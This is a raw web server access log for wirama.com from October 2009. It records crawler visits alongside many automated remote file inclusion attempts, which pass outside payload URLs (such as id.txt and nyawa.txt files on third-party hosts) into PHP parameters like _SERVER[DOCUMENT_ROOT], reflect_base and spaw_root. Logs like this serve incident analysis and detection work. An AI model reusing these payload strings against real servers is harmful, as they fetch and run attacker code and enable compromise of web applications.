220.125.237.35 - - [03/Oct/2009:11:09:19 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:09:19 -0700] "GET /logs/access_090331.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:09:19 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
65.55.208.58 - - [03/Oct/2009:11:09:31 -0700] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.181 - - [03/Oct/2009:11:21:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.181 - - [03/Oct/2009:11:23:16 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:27:02 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:27:02 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:27:02 -0700] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [03/Oct/2009:11:27:18 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://speha.com/speha-news/attachments/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [03/Oct/2009:11:27:18 -0700] "GET /logs/access_090801.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://speha.com/speha-news/attachments/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [03/Oct/2009:11:27:18 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://speha.com/speha-news/attachments/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:27:29 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:27:29 -0700] "GET /logs/access_090601.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:27:29 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:27:32 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [03/Oct/2009:11:28:02 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [03/Oct/2009:11:28:02 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [03/Oct/2009:11:28:02 -0700] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [03/Oct/2009:11:28:08 -0700] "GET /logs/access_090601.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://speha.com/speha-news/attachments/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:28:09 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:28:09 -0700] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:28:09 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.239.114.81 - - [03/Oct/2009:11:28:32 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [03/Oct/2009:11:29:55 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [03/Oct/2009:11:29:55 -0700] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [03/Oct/2009:11:29:55 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [03/Oct/2009:11:30:45 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maple.k-league.ca/bbs//nyawa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:38:41 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:38:41 -0700] "GET /logs/access_090331.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:38:41 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [03/Oct/2009:11:39:15 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://speha.com/speha-news/attachments/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [03/Oct/2009:11:39:15 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://speha.com/speha-news/attachments/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [03/Oct/2009:11:39:15 -0700] "GET /logs/access_090601.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://speha.com/speha-news/attachments/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.215 - - [03/Oct/2009:12:06:23 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:12:08:41 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:12:08:41 -0700] "GET /logs/access_090331.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:12:08:41 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:12:09:00 -0700] "GET /logs/access_090601.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.231 - - [03/Oct/2009:12:10:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.231 - - [03/Oct/2009:12:11:19 -0700] "GET /logs/?D=D HTTP/1.1" 200 3137 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
174.34.157.98 - - [03/Oct/2009:12:51:20 -0700] "GET /logs/access_090329.log HTTP/1.1" 206 1685256 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt\\)" "www.wirama.com"
174.34.157.98 - - [03/Oct/2009:12:51:21 -0700] "GET /logs/access_090329.log HTTP/1.1" 206 1048576 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
65.55.207.49 - - [03/Oct/2009:12:51:46 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
220.125.237.35 - - [03/Oct/2009:12:59:36 -0700] "GET /logs/access_090801.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:12:59:36 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:12:59:36 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:13:00:02 -0700] "GET /logs/access_090601.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:17:18 -0700] "GET /login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:17:18 -0700] "GET /logs/login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:17:19 -0700] "GET /logs/access_090331.log/login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:17:23 -0700] "GET /logs/access_090601.log/login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.52 - - [03/Oct/2009:13:18:48 -0700] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:21:33 -0700] "GET /logs/access_090331.log/login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:21:33 -0700] "GET /logs/login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:21:33 -0700] "GET /login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [03/Oct/2009:13:21:53 -0700] "GET /logs/access_090601.log/login.php?dir=http://www.s296238841.onlinehome.us//admin/help/copyright? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:13:31:28 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:13:31:28 -0700] "GET /logs/access_090331.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:13:31:28 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [03/Oct/2009:13:32:13 -0700] "GET /logs/ HTTP/1.0" 200 3121 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.106.163 - - [03/Oct/2009:13:35:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.78.215 - - [03/Oct/2009:13:37:14 -0700] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
72.30.78.215 - - [03/Oct/2009:13:37:59 -0700] "GET /logs/access_090331.log HTTP/1.0" 200 82112 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
64.202.120.88 - - [03/Oct/2009:13:43:19 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
64.202.120.88 - - [03/Oct/2009:13:43:19 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
220.125.237.35 - - [03/Oct/2009:13:56:55 -0700] "GET /logs/access_090331.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:13:56:55 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:13:56:55 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
65.55.106.163 - - [03/Oct/2009:14:00:25 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:02:05 -0700] "GET /error.php?dir=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:02:06 -0700] "GET /logs/error.php?dir=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:02:09 -0700] "GET /logs/access_090601.log/error.php?dir=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:06:02 -0700] "GET /logs/access_090801.log/error.php?dir=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.223 - - [03/Oct/2009:14:12:55 -0700] "GET /logs/!rfihttp://geo.metodist.ru/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
199.120.90.223 - - [03/Oct/2009:14:12:56 -0700] "GET /!rfihttp://geo.metodist.ru/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
212.249.57.201 - - [03/Oct/2009:14:18:34 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
212.249.57.201 - - [03/Oct/2009:14:18:35 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
65.55.106.233 - - [03/Oct/2009:14:18:55 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.78.215 - - [03/Oct/2009:14:20:54 -0700] "GET /_private/ HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
115.68.22.76 - - [03/Oct/2009:14:21:15 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:21:15 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:21:18 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [03/Oct/2009:14:21:45 -0700] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
220.125.237.35 - - [03/Oct/2009:14:24:07 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:14:24:07 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:14:24:07 -0700] "GET /logs/access_090331.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:14:24:12 -0700] "GET /logs/access_090330.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:31:17 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:31:17 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:14:31:22 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [03/Oct/2009:14:35:35 -0700] "GET /logs/access_090330.log HTTP/1.0" 200 67247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
220.125.237.35 - - [03/Oct/2009:14:40:40 -0700] "GET /logs/access_090601.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:14:40:40 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:14:40:40 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:14:42:04 -0700] "GET /logs/access_090331.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.233 - - [03/Oct/2009:14:44:25 -0700] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.138 - - [03/Oct/2009:15:11:18 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
115.68.22.76 - - [03/Oct/2009:15:14:56 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:15:14:56 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:15:14:56 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:15:19:08 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:15:19:12 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [03/Oct/2009:15:19:12 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.37.172 - - [03/Oct/2009:15:21:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.wirama.com"
65.55.37.172 - - [03/Oct/2009:15:21:35 -0700] "GET /?N=D HTTP/1.1" 200 916 "-" "Mozilla/4.0" "www.wirama.com"
65.55.208.49 - - [03/Oct/2009:15:40:41 -0700] "GET /_private/?M=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.40.68.132 - - [03/Oct/2009:15:41:57 -0700] "GET /logs/access_090601.log//bbs/skin/ggambo6200_gallery/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.40.68.132 - - [03/Oct/2009:15:41:57 -0700] "GET /logs//bbs/skin/ggambo6200_gallery/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.40.68.132 - - [03/Oct/2009:15:41:58 -0700] "GET /bbs/skin/ggambo6200_gallery/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.40.68.132 - - [03/Oct/2009:15:45:20 -0700] "GET /logs/access_090801.log//bbs/skin/ggambo6200_gallery/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.130.29.11 - - [03/Oct/2009:16:20:13 -0700] "GET /error.php?dir=http://www.nav6.org/nc??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
121.130.29.11 - - [03/Oct/2009:16:20:13 -0700] "GET /logs//error.php?dir=http://www.nav6.org/nc??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.106.109 - - [03/Oct/2009:16:32:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.109 - - [03/Oct/2009:16:37:20 -0700] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
58.61.164.40 - - [03/Oct/2009:16:42:44 -0700] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.wirama.com"
72.30.78.215 - - [03/Oct/2009:16:47:35 -0700] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
202.218.119.122 - - [03/Oct/2009:16:48:05 -0700] "GET /logs/access_090331.log//login.php?dir=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.218.119.122 - - [03/Oct/2009:16:48:05 -0700] "GET /logs//login.php?dir=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.218.119.122 - - [03/Oct/2009:16:48:05 -0700] "GET /login.php?dir=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.218.119.122 - - [03/Oct/2009:16:48:14 -0700] "GET /logs/access_090601.log//login.php?dir=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.2.194.146 - - [03/Oct/2009:16:52:21 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "wirama.com"
62.2.194.146 - - [03/Oct/2009:16:52:21 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "wirama.com"
206.225.23.4 - - [03/Oct/2009:16:52:41 -0700] "GET /logs/access_090331.log/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [03/Oct/2009:16:52:41 -0700] "GET /logs/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [03/Oct/2009:16:52:41 -0700] "GET /ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [03/Oct/2009:16:53:11 -0700] "GET /ask_password.php?dir=http://www.telephone114.com/114gg/bruto/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [03/Oct/2009:16:53:11 -0700] "GET /logs/ask_password.php?dir=http://www.telephone114.com/114gg/bruto/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [03/Oct/2009:16:53:11 -0700] "GET /logs/access_090331.log/ask_password.php?dir=http://www.telephone114.com/114gg/bruto/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
